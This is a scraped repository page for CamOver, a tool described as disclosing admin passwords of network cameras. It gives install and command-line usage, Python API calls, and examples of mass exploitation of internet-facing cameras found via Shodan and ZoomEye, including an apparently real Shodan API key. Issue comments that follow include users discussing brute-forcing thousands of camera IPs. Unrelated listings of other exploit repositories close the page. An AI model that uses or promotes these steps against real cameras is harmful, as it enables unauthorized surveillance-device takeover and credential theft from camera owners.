CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Related tags

Security related resourcesiotcameraexploitcamera-controliot-hackingcamera-hackingentysecwebcam-hackingcamera-exploitation
Overview

CamOver

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Features

  • Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.

Installation

pip3 install git+https://github.com/EntySec/CamOver

Basic usage

To use CamOver just type camover in your terminal.

usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
               [--zoomeye ZOOMEYE] [-p PAGES]

CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.

optional arguments:
  -h, --help            show this help message and exit
  -t, --threads         Use threads for fastest work.
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.

Examples

Exploiting single camera

Let's hack my camera just for fun.

camover -a 192.168.99.100

Exploiting cameras from Internet

Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with -t for fast exploitation.

camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)

Exploiting cameras from input file

Let's try to use opened database of cameras with -t for fast exploitation.

camover -t -i cameras.txt -o passwords.txt

NOTE: It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

API usage

CamOver also has their own Python API that can be invoked by importing CamOver to your code.

from camover import CamOver

Basic functions

There are all CamOver basic functions that can be used to exploit specified camera.

  • exploit(address) - Exploit single camera by given address.

Examples

Exploiting single camera

from camover import CamOver

camover = CamOver()
creds = camover.exploit('192.168.99.100')

print(creds)

Other tools

Comments
  • why creds was none?

    why creds was none?

    Holle! Excuse me.

    Python 3.10.4 (main, Mar 25 2022, 15:08:58) [Clang 12.0.8 (https://android.googlesource.com/toolchain/llvm-project c935d99d7 on linux Type "help", "copyright", "credits" or "license" for more information.

    from camover import CamOver camover = CamOver() creds = camover.exploit('192.168.99.100') print(creds) (None, None) creds = camover.exploit('192.168.10.2') print(creds) (None, None)

    #"192.168.10.2"was my camera address,it was online. why creds was none? thanks, please.

    opened by wr0x00 4
  • No output

    No output

    Not sure what is going on but I got a list of cams and put them inside a txt and ran a command with and without threads and I'm not getting any output file even if I change the outputs name and refresh it doesn't seem to be making the list for some reason. Earlier I ran it for the first time and it got an output with only 1 ip but now i can't even get any output

    camover -t -i test.txt --output newlist.txt

    I run this and I get nothing outputted.

    opened by SinThroughCode 2
  • Confused

    Confused

    I ran my own list of IPs and it returned a result of zero passwords for any of them and so I started trying to use the single brute method on around 30 of them and all said not vulnerable. So i tested it with expcamera and each IP I entered in that list was bruted with zero problem. I'm unsure of what would cause this and I know for a fact this list of 2k ips which is fresh from zoomeye are all mostly vulnerable considering I'm screening the same list on expcam right now and its still getting the passwords fine.

    opened by SinThroughCode 1
  • Directory: : does not exist!

    Directory: : does not exist!

    Why does it prompt that the directory does not exist when I execute the following command? Where to put password.txt in which directory

    :~$ camover --shodan (My API_KEY) -o password.txt [-] Directory: : does not exist!

    opened by ChhR00 1
  • When I install the program, I encounter this problem, how can I solve it?

    When I install the program, I encounter this problem, how can I solve it?

    [email protected]:~# pip3 install git+https://github.com/EntySec/CamOver.git Collecting git+https://github.com/EntySec/CamOver.git Cloning https://github.com/EntySec/CamOver.git to /tmp/pip-req-build-zchrgnp4 Running command git clone -q https://github.com/EntySec/CamOver.git /tmp/pip-req-build-zchrgnp4 fatal: unable to access 'https://github.com/EntySec/CamOver.git/': Could not resolve host: github.com ERROR: Command errored out with exit status 128: git clone -q https://github.com/EntySec/CamOver.git /tmp/pip-req-build-zchrgnp4 Check the logs for full command output.

    opened by ChhR00 1
  • Search Shodan by Country/City

    Search Shodan by Country/City

    Hello!

    Is there any way to search in Shodan by country and/or city?

    In the past, when Entynet Project was alive, I remember editing the source of Entropy to modify the Shodan.query but I can't find a way.

    Any help is welcomed.

    Thanks!

    opened by pispuso 1
  • Failed to Authorize Shodan

    Failed to Authorize Shodan

    Hi,

    When I type this command camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD I get an error [*] Authorizing Shodan by given API key... [-] Failed to authorize Shodan!

    Any ideas ?

    opened by ghost 1
Releases(1.0.0)
Owner
EntySec
EntySec is a group of security professionals and software engineers involved in the development of security tools and services.
EntySec
GitHub Repository http://entysec.netlify.app
EyeJo是一款自动化资产风险评估平台,可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查,快速发现存在的薄弱点和攻击面。

EyeJo EyeJo是一款自动化资产风险评估平台,可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查,快速发现存在的薄弱点和攻击面。 免责声明 本平台集成了大量的互联网公开工具,主要是方便安全人员整理、排查资产、安全测试等,切勿用于非法用途。使用者存在危害网络安全等任何非法行为,后果自负,作

429 Dec 31, 2022
Auerswald COMpact 8.0B Backdoors exploit

CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

6 Sep 22, 2022
Python tool for exploiting CVE-2021-35616

OracleOTM Python tool for exploiting CVE-2021-35616 The script works in modules, which I implemented in the following order: ► Username enumeration ►

11 Dec 06, 2022
Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29. This vulnerability is commonly referred to as "Sprin

Chris Partridge 105 Nov 26, 2022
This project is for finding a solution to use Security Onion Elastic data with Jupyter Notebooks.

This project is for finding a solution to use Security Onion Elastic data with Jupyter Notebooks. The goal is to successfully use this notebook project below with Security Onion for beacon detection

4 Jun 08, 2022
VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

vcenter_fileread_exploit VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read Usage python3 vCenter_fileread.py http(s)://ip Referen

Ashish Kunwar 4 Sep 23, 2022
BOF-Roaster is an automated buffer overflow exploit machine which is begin written with Python 3.

BOF-Roaster is an automated buffer overflow exploit machine which is begin written with Python 3. On first release it was able to successfully break many of the most well-known buffer overflow exampl

Kaan Caglan 5 Nov 23, 2021
A secure password generator written in python

gruvbox-factory 🏭 "The main focus when developing gruvbox is to keep colors easily distinguishable, contrast enough and still pleasant for the eyes"

Paulo Pacitti 430 Dec 27, 2022
log4j-tools: CVE-2021-44228 poses a serious threat to a wide range of Java-based applications

log4j-tools Quick links Click to find: Inclusions of log4j2 in compiled code Calls to log4j2 in compiled code Calls to log4j2 in source code Overview

JFrog Ltd. 171 Dec 25, 2022
In this program, I generate the strong password from existing password without class using python. The special thing in this program is that is generate very strong password from our existing password. It replaces some elements from password and put another elements in it.

Strong-password-Generator-from-existing-password-using-python In this program, I generate the strong password from existing password without class usi

Sachin Vinayak Dabhade 4 Sep 24, 2021
A Python script that can be used to check if a SAP system is affected by CVE-2022-22536

Vulnerability assessment for CVE-2022-22536 This repository contains a Python script that can be used to check if a SAP system is affected by CVE-2022

Onapsis Inc. 42 Dec 01, 2022
A brute Force tool for Facebook

EliBruter A brute Force tool for Facebook Installing this tool -- $ pkg upgrade && update $ pkg install python $ pkg install python3 $ pkg install gi

Eli Hacks 3 Mar 29, 2022
Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Context Information Security 701 Dec 27, 2022
Mr.Holmes is a information gathering tool (OSINT)

🔍 Mr.Holmes Mr.Holmes is a information gathering tool (OSINT). Is main purpose is to gain information about domains,username and phone numbers with t

534 Jan 08, 2023
This is simple python FTP password craker. To crack FTP login using wordlist based brute force attack

This is simple python FTP password craker. To crack FTP login using wordlist based brute force attack

Varun Jagtap 5 Oct 08, 2022
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF-GetWebShell) usage: python ProxyLogon.py --host=exchang

112 Dec 01, 2022
Exploit grafana Pre-Auth LFI

Grafana-LFI-8.x Exploit grafana Pre-Auth LFI How to use python3

2 Jul 25, 2022
Add a Web Server based on Rogue Mysql Server to allow remote user get

介绍 对于需要使用 Rogue Mysql Server 的漏洞来说,若想批量检测这种漏洞的话需要自备一个服务器。并且我常用的Rogue Mysql Server 脚本 不支持动态更改读取文件名、不支持远程用户访问读取结果、不支持批量化检测网站。于是乎萌生了这个小脚本的想法 Rogue-MySql-

6 May 17, 2022
CVE-2022-21907 Vulnerability PoC

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17, just some sm

Michele 16 Dec 18, 2022
Script checks provided domains for log4j vulnerability

log4j Script checks provided domains for log4j vulnerability. A token is created with canarytokens.org and passed as header at request for a single do

Matthias Nehls 2 Dec 12, 2021